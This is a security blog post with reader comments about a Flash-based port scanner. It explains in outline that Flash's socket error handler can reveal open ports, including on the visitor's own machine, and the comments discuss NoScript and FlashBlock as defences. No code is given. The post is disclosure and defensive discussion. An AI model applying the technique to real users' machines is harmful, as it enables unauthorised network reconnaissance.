Cenzic 232 Patent
Paid Advertising
web application security lab

More Port Scanning - This Time in Flash

A few weeks ago fukami showed me a sample application he had written in Flash to do port scanning. It was actually really good, and accurate. It’s probably a preferred method, if the target uses flash since it’s pretty fast. He asked me to wait to post until after he had released it, and he has now done so. Please check out his demo and writeup here. You’ll need both JS and Flash enabled.

The basic premise is the error handler for the socket control can be used to detect raw sockets that are open. It also doesn’t seem to have restrictions against testing localhost, and not the server it’s hosted on, which is a pretty bad cross domain issue. He recommends downgrading flash to 8 and/or using Flash only on trusted sites (which is only helpful if the site isn’t vulnerable to XSS). Great demo, and nice work by fukami!

4 Responses to “More Port Scanning - This Time in Flash”

  1. Darkster Says:

    It’s a bit scary to see what’s possible. Nevertheless this is app is awesom :)

  2. Giorgio Maone Says:

    “Using Flash only on trusted sites (which is only helpful if the site isnít vulnerable to XSS)”

    By “using Flash only on trusted sites” you may either mean using FlashBlock or NoScript.

    If you’re using FlashBlock you’re not safe, because code execution is not reliably prevented (you’re just ensured you won’t see the movie).

    If you’re using NoScript to block Flash (NoScript Options|Advanced|Untrusted), you’ve got protection against reflective XSS, so “it’s helpful unless the trusted site is vulnerable to PERSISTENT XSS”.

    Furthermore, you can additionally enable the “noscript.contentBlocker” behavior ( http://noscript.net/features#contentblocking ): Flash content will be blocked by default even on “trusted” sites, until you explicitly enable each applet by clicking on it, after being notified about its origin.

  3. h3xStream Says:

    @Giorgio Maone
    FlashBlock isn’t only hidding flash object ..
    it does load any until you manually activate them.

  4. Giorgio Maone Says:

    @h3xStream:
    you’re right, I’ve just tested it.
    Many thanks for the pointer :)